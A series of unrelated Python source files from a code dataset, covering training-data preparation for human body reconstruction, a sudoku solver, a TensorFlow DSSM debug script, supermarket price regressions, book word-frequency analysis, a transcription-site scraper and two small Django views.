joblib.load(pca_ml_model_path)\n fml_model = joblib.load(pca_fml_model_path)\n\n paths = sorted([path for path in Path(pca_in_dir).glob('*.*')])\n if n_files > 0:\n paths = paths[:n_files]\n\n heights = []\n for path in tqdm(paths, desc='dump height'):\n param = np.load(path)\n if '_male' in path.stem:\n assert param[0] >= 0.9, f'{param[0]} >= 0.9, {path.name}'\n verts = ml_model.inverse_transform(param[1:])\n else:\n assert param[0] <= 0.1, f'{param[0]} <= 0.1, {path.name}'\n verts = fml_model.inverse_transform(param[1:])\n\n verts = verts.reshape(verts.shape[0] // 3, 3)\n h = verts[:, 2].max() - verts[:, 2].min()\n heights.append((path.stem, h))\n\n with open(height_out_path, 'wt') as file:\n file.writelines(f\"{l[0]} {l[1]}\\n\" for l in heights)\n\n\ndef verify_splitting_pose_variant(paths, train_idxs, valid_idxs, test_idxs, N_pose_per_subject):\n \"\"\"\n verify that all pose variants of a subject stay 
completely inside each set\n :param paths:\n :param train_idxs:\n :param valid_idxs:\n :param test_idxs:\n :param N_pose_per_subject:\n \"\"\"\n train_paths = [paths[idx] for idx in train_idxs]\n valid_paths = [paths[idx] for idx in valid_idxs]\n test_paths = [paths[idx] for idx in test_idxs]\n verify_pose_variants_per_name(train_paths, N_pose_per_subject)\n verify_pose_variants_per_name(valid_paths, N_pose_per_subject)\n verify_pose_variants_per_name(test_paths, N_pose_per_subject)\n\ndef split_train_valid_test_pose_variants(sil_f_paths, sil_s_paths):\n assert len(sil_f_paths) == len(sil_s_paths)\n for path_f, path_s in zip(sil_f_paths, sil_s_paths):\n assert Path(path_f).name == Path(path_s).name\n\n # find unique mesh. ignore pose variants\n unique_names = set()\n for path in sil_f_paths:\n org_name = remove_pose_variant_in_file_name(path.stem)\n unique_names.add(org_name)\n\n unique_names = [name for name in unique_names]\n N_uniq = len(unique_names)\n\n # split the subject unique names into train, valid, test sets\n #np.random.seed(100)\n label = np.zeros(N_uniq, dtype=np.uint8)\n for idx, name in enumerate(unique_names):\n label[idx] = 1 if '_male' in name else 0\n org_train_idxs, org_test_idxs = train_test_split(np.arange(N_uniq), test_size=0.1, stratify=label) # big test size for reduced traning time\n\n label = np.zeros(len(org_train_idxs), dtype=np.uint8)\n for i in range(len(org_train_idxs)):\n label[i] = 1 if '_male' in unique_names[org_train_idxs[i]] else 0\n org_train_idxs, org_valid_idxs = train_test_split(org_train_idxs, test_size=0.10, stratify=label)\n\n # classify subject/human names into train, valid, test\n name_classes = {}\n for idx in org_train_idxs:\n name_classes[unique_names[idx]] = 'train'\n for idx in org_valid_idxs:\n name_classes[unique_names[idx]] = 'valid'\n for idx in org_test_idxs:\n name_classes[unique_names[idx]] = 'test'\n\n # now we classify all pose variant paths in to train, valid, test sets\n # based on the corresponding subject/human name\n train_idxs = []\n valid_idxs = []\n test_idxs = []\n for idx, path in enumerate(sil_f_paths):\n org_name = remove_pose_variant_in_file_name(path.stem)\n class_id = name_classes[org_name]\n if class_id == 'train':\n train_idxs.append(idx)\n elif class_id == 'valid':\n valid_idxs.append(idx)\n elif class_id == 'test':\n test_idxs.append(idx)\n else:\n assert 'opp. something wrong. 
unexpected name format'\n\n return np.array(train_idxs), np.array(valid_idxs), np.array(test_idxs)\n\ndef split_train_valid_test(sil_f_paths, sil_s_paths):\n assert len(sil_f_paths) == len(sil_s_paths)\n for path_f, path_s in zip(sil_f_paths, sil_s_paths):\n assert Path(path_f).name == Path(path_s).name\n\n n = len(sil_f_paths_dict)\n n_females = len([name for name in sil_f_paths if '_female' in name])\n n_males = len([name for name in sil_f_paths if '_male' in name])\n print(f'n females = {n_females}, n_males = {n_males}')\n\n np.random.seed(100)\n label = np.zeros(len(sil_f_paths), dtype=np.uint8)\n for idx, path in enumerate(sil_f_paths):\n label[idx] = 1 if '_male' in path.stem else 0\n train_idxs, test_idxs = train_test_split(np.arange(n), test_size=0.1, stratify=label) # big test size for reduced traning time\n\n label = np.zeros(len(train_idxs), dtype=np.uint8)\n for i in range(len(train_idxs)):\n label[i] = 1 if '_male' in sil_f_paths[train_idxs[i]].stem else 0\n train_idxs, valid_idxs = train_test_split(train_idxs, test_size=0.10, stratify=label)\n\n return train_idxs, valid_idxs, test_idxs\n\ndef check_input_visually(sil_f_ml_dir, sil_s_ml_dir, sil_f_fml_dir, sil_s_fml_dir):\n import matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-sil_dir\", default=True, required=True)\n ap.add_argument(\"-target_ml_dir\", default=True, required=False)\n ap.add_argument(\"-target_fml_dir\", default=True, required=False)\n ap.add_argument(\"-pca_ml_model_path\", default=True, required=False)\n ap.add_argument(\"-pca_fml_model_path\", default=True, required=False)\n ap.add_argument(\"-vic_mesh_path\", required=True, help=\"path to victoria template mesh to store in the output directory\")\n ap.add_argument(\"-out_dir\", default=False, required=False)\n ap.add_argument(\"-resize_size\", type=str, default='360x360', required=False)\n ap.add_argument(\"-post_process\", action='store_true')\n ap.add_argument(\"-c\", \"--is_color\", action='store_true',help=\"color body part parsing or binary silhouette?\")\n ap.add_argument(\"-p\", \"--n_pose_variant\", type=int, default=0 ,help=\"are there pose variants in the input images?: name0_pose0, name0_pose1, name0_pose30,..\")\n args = ap.parse_args()\n\n size = args.resize_size.split('x')\n size = (int(size[0]), int(size[1]))\n\n sil_f_ml_dir = f'{args.sil_dir}/male/sil_f_raw/'\n sil_s_ml_dir = f'{args.sil_dir}/male/sil_s_raw/'\n sil_f_fml_dir = f'{args.sil_dir}/female/sil_f_raw/'\n sil_s_fml_dir = f'{args.sil_dir}/female/sil_s_raw/'\n assert Path(sil_f_ml_dir).exists(), f'{sil_f_ml_dir} does not exist'\n assert Path(sil_s_ml_dir).exists(), f'{sil_s_ml_dir} does not exist'\n assert Path(sil_f_fml_dir).exists(), f'{sil_f_fml_dir} does not exist'\n assert Path(sil_s_fml_dir).exists(), f'{sil_s_fml_dir} does not exist'\n\n os.makedirs(args.out_dir, exist_ok=True)\n\n # path = '/home/khanhhh/data_1/projects/Oh/data/3d_human/caesar_obj/blender_images/realistic_projections/female/front/CSR0017A.png'\n # segment_body_part_sil_f(path)\n # exit()\n\n #save pca model\n model_female = joblib.load(filename=args.pca_fml_model_path)\n model_male = joblib.load(filename=args.pca_ml_model_path)\n pca_model = PcaModel(model_female=model_female, model_male=model_male)\n out_path = os.path.join(*[args.out_dir, 'pca_model.jlb'])\n pca_model.dump(out_path)\n\n print(f'dump pca model to {out_path}')\n\n #n_file = 30*10 #for debugging with small number of files\n n_file = -1\n # copy pca target with the same name pattern 
to the out dir\n out_target_dir = os.path.join(*[args.out_dir, 'target'])\n copy_target_prefix(args.target_fml_dir, out_target_dir, '_female', args.n_pose_variant, n_files=n_file)\n copy_target_prefix(args.target_ml_dir, out_target_dir, '_male', args.n_pose_variant, n_files=n_file)\n\n out_height_path = os.path.join(*[args.out_dir, 'height.txt'])\n dump_heights(pca_in_dir=out_target_dir,\n pca_ml_model_path=args.pca_ml_model_path, pca_fml_model_path=args.pca_fml_model_path,\n height_out_path=out_height_path)\n\n #exit()\n vic_mesh_path = Path(args.vic_mesh_path)\n shutil.copy(str(vic_mesh_path), os.path.join(*[args.out_dir, \"vic_template_mesh.obj\"]))\n\n with tempfile.TemporaryDirectory() as tmp_dir:\n print(f'created temporary dir: {tmp_dir}')\n\n tmp_sil_f_dir = os.path.join(*[tmp_dir, 'sil_f'])\n tmp_sil_s_dir = os.path.join(*[tmp_dir, 'sil_s'])\n\n # merge both male and female to a tempt dir and make their file names distinctive\n copy_file_prefix(sil_f_ml_dir, tmp_sil_f_dir, '_male', n_file=n_file)\n copy_file_prefix(sil_s_ml_dir, tmp_sil_s_dir, '_male',n_file=n_file)\n\n copy_file_prefix(sil_f_fml_dir, tmp_sil_f_dir, '_female',n_file=n_file)\n copy_file_prefix(sil_s_fml_dir, tmp_sil_s_dir, '_female',n_file=n_file)\n\n #remove_missing_pair(tmp_sil_f_dir, tmp_sil_s_dir)\n #make sure that there is a complete pari: front-side for every images\n verify_missing_pair(tmp_sil_f_dir, tmp_sil_s_dir)\n\n sil_f_paths_dict = dict([(path.stem, path) for path in Path(tmp_sil_f_dir).glob('*.*')])\n sil_s_paths_dict = dict([(path.stem, path) for path in Path(tmp_sil_s_dir).glob('*.*')])\n assert sil_f_paths_dict.keys() == sil_s_paths_dict.keys()\n\n sil_f_paths = [path for path in sil_f_paths_dict.values()]\n sil_s_paths = [path for path in sil_s_paths_dict.values()]\n\n name_ids = [id for id in sil_s_paths_dict.keys()]\n\n out_sil_f_dir = join(*[args.out_dir, 'sil_f'])\n out_sil_s_dir = join(*[args.out_dir, 'sil_s'])\n os.makedirs(out_sil_f_dir, exist_ok=True)\n\n os.makedirs(out_sil_s_dir, exist_ok=True)\n\n if args.n_pose_variant == 0:\n train_idxs, valid_idxs, test_idxs = split_train_valid_test(sil_f_paths, sil_s_paths)\n else:\n #if there are N_pose_variants per subject, we need to split in a way that all pose variant images of a subject\n #stay completely inside a set. 
There must be no cases like: subject0_pose_0 is in the train set but subject0_pose_25 is in the test set\n train_idxs, valid_idxs, test_idxs = split_train_valid_test_pose_variants(sil_f_paths, sil_s_paths)\n\n #verify if our splitting is correct\n verify_splitting_pose_variant(sil_f_paths, train_idxs=train_idxs, valid_idxs=valid_idxs, test_idxs=test_idxs, N_pose_per_subject=args.n_pose_variant)\n verify_splitting_pose_variant(sil_s_paths, train_idxs=train_idxs, valid_idxs=valid_idxs, test_idxs=test_idxs, N_pose_per_subject=args.n_pose_variant)\n\n copy_train_valid_test(name_ids, sil_f_paths_dict, train_idxs=train_idxs, valid_idxs=valid_idxs, test_idxs=test_idxs, out_dir=out_sil_f_dir, args=args)\n copy_train_valid_test(name_ids, sil_s_paths_dict, train_idxs=train_idxs, valid_idxs=valid_idxs, test_idxs=test_idxs, out_dir=out_sil_s_dir, args=args)\n\n print(f'deleted temporary dir')\n\n #if not args.color:\n crop_train_test_valid(out_sil_f_dir, out_sil_s_dir, size, args.is_color)\n\n","repo_name":"khanhha/human_avatar_reconstruction","sub_path":"src/pca/tool_prepare_train_data_ml_fml.py","file_name":"tool_prepare_train_data_ml_fml.py","file_ext":"py","file_size_in_byte":20192,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"40"} +{"seq_id":"4827286708","text":"import math\n\n\ndef is_safe_to_place(board, r, c, num):\n # check for column\n for i in range(len(board[0])):\n if board[r][i] == num:\n return False\n # check for row\n for i in range(len(board)):\n if board[i][c] == num:\n return False\n # check for sub_board\n sqrt_num = int(math.sqrt(len(board)))\n k = r - r % sqrt_num\n e = c - c % sqrt_num\n\n for i in range(k, k + sqrt_num):\n for j in range(e, e + sqrt_num):\n if board[i][j] == num:\n return False\n return True\n\n\ndef solve_sudoko_1(board, r, c):\n if r == len(board):\n return True\n\n if c == len(board[0]):\n solve_sudoko_1(board, r + 1, 0)\n return False\n\n if board[r][c] != \".\":\n solve_sudoko_1(board, r, c+1)\n return False\n\n for i in range(1, len(board[0]) + 1):\n if is_safe_to_place(board, r, c, str(i)):\n board[r][c] = str(i)\n if (solve_sudoko_1(board, r, c+1)):\n return True\n else:\n board[r][c] = \".\"\n return False\n\n\ndef solve_sudoko(board):\n\n flag = True\n row = - 1\n col = -1\n # To replace r, c in arguments\n for i in range(len(board)):\n for j in range(len(board[0])):\n if board[i][j] == \".\":\n row = i\n col = j\n flag = False\n break\n if not flag:\n break\n if flag:\n for row in board:\n print(row)\n return True\n # sudoko is solved\n\n for i in range(1, len(board[0])+1):\n if is_safe_to_place(board, row, col, str(i)):\n board[row][col] = str(i)\n if solve_sudoko(board):\n return True\n board[row][col] = \".\"\n return False\n\n\n\n\n\n\nif __name__ == \"__main__\":\n board = [[\"5\", \"3\", \".\", \".\", \"7\", \".\", \".\", \".\", \".\"], [\"6\", \".\", \".\", \"1\", \"9\", \"5\", \".\", \".\", \".\"],\n [\".\", \"9\", \"8\", \".\", \".\", \".\", \".\", \"6\", \".\"], [\"8\", \".\", \".\", \".\", \"6\", \".\", \".\", \".\", \"3\"],\n [\"4\", \".\", \".\", \"8\", \".\", \"3\", \".\", \".\", \"1\"], [\"7\", \".\", \".\", \".\", \"2\", \".\", \".\", \".\", \"6\"],\n [\".\", \"6\", \".\", \".\", \".\", \".\", \"2\", \"8\", \".\"], [\".\", \".\", \".\", \"4\", \"1\", \"9\", \".\", \".\", \"5\"],\n [\".\", \".\", \".\", \".\", \"8\", \".\", \".\", \"7\", \"9\"]]\n 
print(solve_sudoko(board))\n","repo_name":"mukunda1518/Data-Structures-Algorithms","sub_path":"recursions/backtracking/suduko.py","file_name":"suduko.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24075858781","text":"#coding:utf8\nimport sys\nimport os\nimport numpy as np\n\nimport tensorflow as tf\n\nfrom dssm import DSSM\n\ndef fake_train_data():\n query = np.random.randint(5, size=[100, 2]) \n doc = np.random.randint(5, size=[100, 2]) \n Y = np.random.randint(2, size=[100, 1])\n Y = Y.astype(float)\n return query, doc, Y\n\ndef debug():\n query, doc, Y = fake_train_data()\n dssm = DSSM()\n with tf.Session() as sess:\n saver = tf.train.Saver()\n sess.run(tf.global_variables_initializer())\n for i in range(len(Y)):\n q = query[i:i+1]\n d = doc[i:i+1]\n label = Y[i:i+1]\n print('query:', sess.run(dssm.query, feed_dict={dssm.query : q}))\n print('doc:', sess.run(dssm.doc, feed_dict={dssm.doc : d}))\n print('label:', sess.run(dssm.label, feed_dict={dssm.label : label}))\n\n # embedding table\n print('embedding:', sess.run(dssm.embedding))\n\n # debug query\n print('query_embedding:', sess.run(dssm.query_embeddings, feed_dict={dssm.query : q}))\n print('query_flatten:', sess.run(dssm.query_flatten, feed_dict={dssm.query: q}))\n \n # debug doc\n print('doc_embedding:', sess.run(dssm.doc, feed_dict={dssm.doc : d}))\n print('doc_flatten:', sess.run(dssm.doc_flatten, feed_dict={dssm.doc : d}))\n\n # debug dense layer\n print('query_layer_1_out:', sess.run(dssm.query_layer_1_out, feed_dict={dssm.query : q}))\n print('doc_layer_1_out:', sess.run(dssm.doc_layer_1_out, feed_dict={dssm.doc : d}))\n \n # debug cosine_similarity, score, loss\n print('cosine_similarity:', sess.run(dssm.cosine_similarity, feed_dict={dssm.query : q, dssm.doc : d}))\n print('score:', sess.run(dssm.score, feed_dict={dssm.query : q, dssm.doc : d}))\n print('loss:', sess.run(dssm.loss, feed_dict={dssm.query : q, dssm.doc : d, dssm.label : label}))\n\n\nif __name__ == '__main__':\n debug()\n sys.exit(0)\n","repo_name":"ustcqi/tftoys","sub_path":"sparse_dnn/dssm/high_order_api/dssm_test.py","file_name":"dssm_test.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33563811428","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- \n\nfrom __future__ import print_function\nimport add_to_path\nfrom add_to_path import path_data\nfrom functions_generic_qlmc import *\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\n\npath_built = os.path.join(path_data,\n 'data_supermarkets',\n 'data_built',\n 'data_qlmc_2007_12')\n\npath_built_csv = os.path.join(path_built, 'data_csv')\n\n# ###########\n# LOAD DATA\n#############\n\ndateparse = lambda x: pd.datetime.strptime(x, '%d/%m/%Y')\ndf_qlmc = pd.read_csv(os.path.join(path_built_csv,\n 'df_qlmc.csv'),\n parse_dates = ['date'],\n date_parser = dateparse,\n encoding = 'utf-8')\n\n# Fix Store_Chain for prelim stats des\nls_sc_drop = ['CARREFOUR CITY',\n 'CARREFOUR CONTACT',\n 'CARREFOUR PLANET',\n 'GEANT DISCOUNT',\n 'HYPER CHAMPION',\n 'INTERMARCHE HYPER',\n 'LECLERC EXPRESS',\n 'MARCHE U',\n 'U EXPRESS']\n\ndf_qlmc = df_qlmc[~df_qlmc['store_chain'].isin(ls_sc_drop)]\n\nls_sc_replace = [('CENTRE E. LECLERC', 'LECLERC'),\n ('CENTRE LECLERC', 'LECLERC'),\n ('E. 
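solve_sudoko_1 in suduko.py above discards the results of its recursive calls, so a solved board found deeper in the recursion never propagates back up. A corrected sketch of the same cell-by-cell backtracking, keeping the record's conventions (digits as strings, "." for empty, sqrt-sized sub-grids):

```python
# Cell-by-cell sudoku backtracking; the fix is to *return* each recursive
# call's result so success propagates to the caller.
import math

def is_safe(board, r, c, num):
    n = len(board)
    if any(board[r][j] == num for j in range(n)):   # row clash
        return False
    if any(board[i][c] == num for i in range(n)):   # column clash
        return False
    k = int(math.sqrt(n))
    r0, c0 = r - r % k, c - c % k                   # sub-grid origin
    return all(board[i][j] != num
               for i in range(r0, r0 + k)
               for j in range(c0, c0 + k))

def solve(board, r=0, c=0):
    n = len(board)
    if r == n:
        return True                     # walked past the last row: solved
    if c == n:
        return solve(board, r + 1, 0)   # wrap to the next row
    if board[r][c] != ".":
        return solve(board, r, c + 1)   # skip pre-filled cells
    for num in map(str, range(1, n + 1)):
        if is_safe(board, r, c, num):
            board[r][c] = num
            if solve(board, r, c + 1):
                return True
            board[r][c] = "."           # backtrack
    return False
```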
LECLERC', 'LECLERC'),\n ('E.LECLERC', 'LECLERC'),\n ('SYSTEME U', 'SUPER U'),\n ('GEANT', 'GEANT CASINO')]\nfor sc_old, sc_new in ls_sc_replace:\n df_qlmc.loc[df_qlmc['store_chain'] == sc_old,\n 'store_chain'] = sc_new\n\n# restrict to period 2 here...\ndf_prices = df_qlmc[df_qlmc['period'] == 2]\ndf_prices = df_prices[~df_prices['id_lsa'].isnull()]\n\n# ###############\n# FORMAT ANALYSIS\n# ###############\n\nls_prod_pairs = [[u'Ricard - Ricard pastis 45 degrés - 50cl',\n u'Ricard - Ricard pastis 45 degrés - 70cl'],\n [u'Ricard - Ricard pastis 45 degrés - 70cl',\n u'Ricard - Ricard pastis 45 degrés - 1L'],\n [u'Ricard - Ricard pastis 45 degrés - 1L',\n u'Ricard - Ricard pastis 45 degrés - 1.5L'],\n [u'Coca Cola - Coca Cola avec caféine - 1.5L',\n u'Coca Cola - Coca Cola avec caféine - 2L'],\n [u'Panzani - Spagheto Sauce pleine saveur bolognaise - 210g',\n u'Panzani - Spagheto Sauce pleine saveur bolognaise - 425g'],\n [u'Panzani - Spagheto Sauce pleine saveur bolognaise - 425g',\n u'Panzani - Spagheto Sauce pleine saveur bolognaise - 600g']]\n \nfor prod_1, prod_2 in ls_prod_pairs:\n print()\n print(prod_1)\n print(prod_2)\n df_prod_1 = df_prices[['id_lsa', 'price']][df_prices['product'] == prod_1]\n df_prod_2 = df_prices[['id_lsa', 'price']][df_prices['product'] == prod_2]\n df_prod_1.set_index('id_lsa', inplace = True)\n df_prod_2.set_index('id_lsa', inplace = True)\n df_prod_f = df_prod_1.join(df_prod_2, how = 'inner', lsuffix='_1', rsuffix='_2')\n # outer may allow to see manipulation or small stores with less inventory\n df_prod_f['spread'] = df_prod_f['price_2'] - df_prod_f['price_1']\n \n df_prod_f = df_prod_f[df_prod_f['spread'] <\\\n df_prod_f['spread'].mean() + 1*df_prod_f['spread'].std()]\n df_prod_f = df_prod_f[df_prod_f['spread'] >\\\n df_prod_f['spread'].mean() - 1*df_prod_f['spread'].std()]\n \n #plt.scatter(df_prod_f['price_1'], df_prod_f['spread'])\n #plt.show()\n #\n #plt.scatter(df_prod_f['price_2'], df_prod_f['spread'])\n #plt.show()\n \n # spread not so easy to interpret, just focus on that for now:\n ax = plt.subplot()\n ax.scatter(df_prod_f['price_1'], df_prod_f['price_2'])\n ax.set_xlabel('price %s' %prod_1)\n ax.set_ylabel('price %s' %prod_2)\n plt.show()\n\n ## caution: get rid of outliers (how to automate?)\n #df_prod_f = df_prod_f[(df_prod_f['spread'] < 10) & (df_prod_f['spread'] > 5)]\n print(smf.ols('spread ~ price_1', data = df_prod_f).fit().summary())\n print(smf.ols('spread ~ price_2', data = df_prod_f).fit().summary())\n","repo_name":"etiennecha/master_code","sub_path":"code_supermarkets_france/analysis/analysis_qlmc_prices_2007_2012/stats_des/price_vs_product_format.py","file_name":"price_vs_product_format.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8629181985","text":"from collections import defaultdict\nimport re\n\nclass TextAnalysis():\n def __init__(self, filepath):\n with open('./1000mostcommonwords.txt') as reader:\n common_words_text = reader.read()\n self.common_words = common_words_text.split()\n \n # process text from book, line by line\n regex = re.compile('[\"$%*+-/:;<=>@^_,\\.!?()]')\n self.words = []\n # store each chapter using the index of the chapter line\n self.chapters = []\n with open(filepath, 'r') as reader:\n self.lines = reader.readlines()\n for i in range(len(self.lines)):\n line = self.lines[i]\n # gutenberg books surround headings with 2 newlines on either side\n if i - 1 >= 0 and i + 1 < len(self.lines) and 
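price_vs_product_format.py above joins two per-store price series, trims the spread to within one standard deviation of its mean, and regresses it on price with the statsmodels formula API. A self-contained sketch of that pipeline, with synthetic prices standing in for the QLMC data:

```python
# Join -> spread -> outlier trim -> OLS, as in the loop above.
import numpy as np
import pandas as pd
import statsmodels.formula.api as smf

rng = np.random.default_rng(0)
price_1 = rng.normal(15.0, 1.0, 200)
df = pd.DataFrame({"price_1": price_1,
                   "price_2": 1.3 * price_1 + rng.normal(0.0, 0.5, 200)})
df["spread"] = df["price_2"] - df["price_1"]

# Keep observations within one standard deviation of the mean spread.
m, s = df["spread"].mean(), df["spread"].std()
df = df[(df["spread"] > m - s) & (df["spread"] < m + s)]

print(smf.ols("spread ~ price_1", data=df).fit().summary())
```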
self.lines[i+1] == \"\\n\" and self.lines[i-1] == \"\\n\":\n if i - 2 >= 0 and i + 2 < len(self.lines) and self.lines[i+2] == \"\\n\" and self.lines[i-2] == \"\\n\":\n self.chapters.append(i)\n #print(line)\n words_unfiltered = line.split()\n for word in words_unfiltered:\n # remove punctuation from word \n word = regex.sub(\"\", word)\n # remove whitespaces\n word = word.strip()\n self.words.append(word)\n #print(self.chapters)\n self.word_count = defaultdict(int)\n for word in self.words:\n self.word_count[word if word == \"I\" else word.lower()] += 1\n self.word_count = list(self.word_count.items())\n\n def getTotalNumberOfWords(self):\n # return the number of words in the file.\n return len(self.words)\n\n def getTotalUniqueWords(self):\n # returns the number of UNIQUE words in the novel\n unique_words = set()\n for word in self.words:\n if word.lower() not in unique_words:\n unique_words.add(word.lower())\n return unique_words\n \n def get20MostFrequentWords(self):\n # return the 20 most frequently used words\n # in the novel and the number of times they were used\n return sorted(self.word_count, key=lambda wc: (-wc[1], wc[0]))[:20]\n\n def get20MostInterestingFrequentWords(self, limit = 100):\n # filters the most common 100 English words and \n # returns the 20 most frequently used words \n # and the number of times they were used\n common_set = set(self.common_words[:limit])\n most_interesting = list(filter(lambda x: x[0] not in common_set, self.word_count))\n most_interesting.sort(key=lambda wc: (-wc[1], wc[0]))\n return most_interesting[:20] \n \n def get20LeastFrequentWords(self):\n # returns the 20 LEAST frequently used words \n # and the number of times they were used\n return sorted(self.word_count, key=lambda x: (x[1], x[0]))[:20]\n\n def getFrequencyOfWord(self, word):\n #return an array of the number of the times the word was used in each chapter\n chapter_idx = 0\n chapter_frequency = defaultdict(int)\n for index in range(len(self.lines)):\n line = self.lines[index]\n # parse each line of current chapter \n for word_text in line.split():\n if word_text.lower() == word.lower():\n chapter_frequency[chapter_idx] += 1 \n if chapter_idx < len(self.chapters) and index == self.chapters[chapter_idx]:\n # we have reached the start of a new chapter\n chapter_idx += 1 \n print(len(self.chapters))\n for chapter in self.chapters:\n if self.lines[chapter].istitle():\n print(self.lines[chapter])\n #print([self.lines[i] for i in self.chapters])\n return list(chapter_frequency.values())\n\n \n\n\n \n","repo_name":"taanguyen/ProjectGutenberg","sub_path":"TextAnalysis.py","file_name":"TextAnalysis.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29964618396","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n# Create your views here.\nfrom .models import pollution_index\nfrom .graph import plot, regression\nfrom django.db.models import Max\nimport datetime\n\ndef gen_graph(request):\n cities = ['Delhi','Bangalore','Mumbai','Las-Vegas','New-York']\n delhi = pollution_index.objects.filter(city = cities[0]).order_by('date')\n graph = plot(request,delhi)\n delhi = delhi.all().aggregate(Max('date'))\n\n fields = []\n dates = []\n for i in range(2,20):\n date = delhi['date__max']+ datetime.timedelta(days=i)\n fields.append([regression(pollution_index.objects.filter(city = cities[0]),str(date) ),date])\n\n\n args = {\n 'plot':graph,\n 'fields':fields,\n }\n 
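The frequency queries in TextAnalysis.py above build a defaultdict and sort it by hand; collections.Counter yields the same top-k directly, and filtering against the common-word set before counting reproduces the "interesting" variant:

```python
# Counter-based equivalents of the top-k word queries above.
from collections import Counter

tokens = "the cat sat on the mat the cat".split()
common = {"the", "on"}          # stand-in for the 1000-common-words list

counts = Counter(tokens)
print(counts.most_common(2))    # [('the', 3), ('cat', 2)]

interesting = Counter(t for t in tokens if t not in common)
print(interesting.most_common(2))  # [('cat', 2), ('sat', 1)]
```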
return render(request,'index.html',args)\n","repo_name":"Smoky-Future/Smoky-Future","sub_path":"pollution-project/levels/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34141887110","text":"#!/bin/python\n\nimport urllib.request\nimport json, os.path, time, math, re, operator\n\n\ncounter = 0\n# current time, used for checking the age of the data files\ncurrTime = int(time.time())\n\n# iterators, for purposes\ncontent = []\n# various variables\n# if the all items file is older than 1 day, get master items file from omeka\nitemsFile = './items.json'\nitemsFileModTime = os.path.getmtime(itemsFile)\nif not os.path.exists( itemsFile) or currTime - itemsFileModTime > 86400:\n urllib.request.urlretrieve('http://publications.newberry.org/transcription/mms-transcribe/api/items/', itemsFile)\n# go through all items in items.json and\n# 1. get file___.json and item___.json (if they are older than 1 day)\n# (we don't bother checking age of both files, if files___.json is older than a day, we get them both - low impact inefficiency (aka who cares))\nwith open(itemsFile) as json_file:\n items = json.load(json_file)\n downloadedFileCount = 0\n skippedFileCount = 0\n for i in items:\n id = str(i['id'])\n itemObj = {\n 'id': id,\n 'count': 0,\n 'lang': '',\n 'desc': '',\n 'cataloglink': '',\n 'image': '',\n 'transcount': 0,\n 'percentTranscribed': 0,\n 'date': '',\n 'category': '',\n 'pages': [],\n }\n itemObj['count'] = i['files']['count']\n filesurl = 'http://publications.newberry.org/transcription/mms-transcribe/api/files?item=' + id\n filesfilename = 'dataFiles/files' + id + '.json'\n itemurl = 'http://publications.newberry.org/transcription/mms-transcribe/api/items/' + id\n itemfilename = 'dataFiles/item' + id + '.json'\n if os.path.exists(filesfilename):\n fileModTime = os.path.getmtime(filesfilename)\n if currTime - fileModTime > 86400:\n downloadedFileCount += 1\n urllib.request.urlretrieve(filesurl, filesfilename)\n urllib.request.urlretrieve(itemurl, itemfilename)\n else:\n skippedFileCount += 1\n # 2. create array of subjects with each corresponding id as a value\n for e in i['element_texts']:\n if e['element']['name'] == 'Subject':\n itemObj['category'] = e['text']\n # 3. 
iterate over files files and get completed status, then add transcripts to content.items.id, concatentated for ease of search\n with open(itemfilename) as item:\n itemJson = json.load(item)\n for ie in itemJson['element_texts']:\n lang = ''\n desc = ''\n image = ''\n weight = ''\n itemObj['id'] = id\n if ie['element']['name'] == 'Language':\n itemObj['lang'] = ie['text']\n if ie['element']['name'] == 'Relation': itemObj['desc'] = ie['text']\n if ie['element']['name'] == 'Description':\n pattern = \"(?P<url>https?://[^\\s]+)\\\" target=\\\"_blank\\\" rel=\\\"noreferrer\\\">View catalog record<\"\n if re.search(pattern, ie['text']) is not None:\n substring = re.search(pattern, ie['text']).group(\"url\").replace('&','&')\n itemObj['cataloglink'] = substring\n if ie['element']['name'] == 'Source':\n itemObj['image'] = ie['text']\n if ie['element']['name'] == 'Title':\n title = ie['text']\n itemObj['title'] = title\n date = re.findall(r'[0-9]{4}', title)\n for i in range(0, len(date)):\n date[i] = int(date[i])\n itemObj['date'] = date\n if lang == '': lang = ['English']\n with open(filesfilename) as files:\n filesJson = json.load(files)\n\n for fi in filesJson:\n counter = counter + 1\n fileObj = {\n 'pageid': fi['id'],\n 'pagefilename': fi['filename'],\n 'transcription': '',\n 'itemid': id,\n 'category': itemObj['category'],\n 'date': itemObj['date'],\n 'lang': itemObj['lang']\n }\n transcription = ''\n for fe in fi['element_texts']:\n if fe['element']['name'] == 'Transcription':\n fileObj['transcription'] = fe['text']\n newFileName = './pages/' + str(fi['id']) + '.json'\n content.append(fileObj)\n with open (newFileName, 'w') as recordFile:\n json.dump(fileObj, recordFile)\n if counter % 500 == 0:\n with open ('./clumps/' + str(counter) + '.json', 'w') as clumpFile:\n json.dump(content, clumpFile)\n content = []\n print(itemObj['id'])\n# with open ('./pages.json', 'w') as recordFile:\n# json.dump(content, recordFile)\nprint('done')\n","repo_name":"NewberryDIS/transcribe","sub_path":"python/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":5071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43469448600","text":"from django.shortcuts import render\n\nfrom web.formularios.formularioPlatos import FormularioRegistroPlatos\nfrom web.formularios.formularioEmpleados import FormularioRegistroEmpleados\nfrom web.models import Platos, Empleados\n\n# Create your views here.\n#Cada vista es una funcion de python \n\ndef Home(request):\n return render(request, 'index.html')\n\ndef PlatosVista(request):\n #cargar el formulario de registros de platos \n formulario = 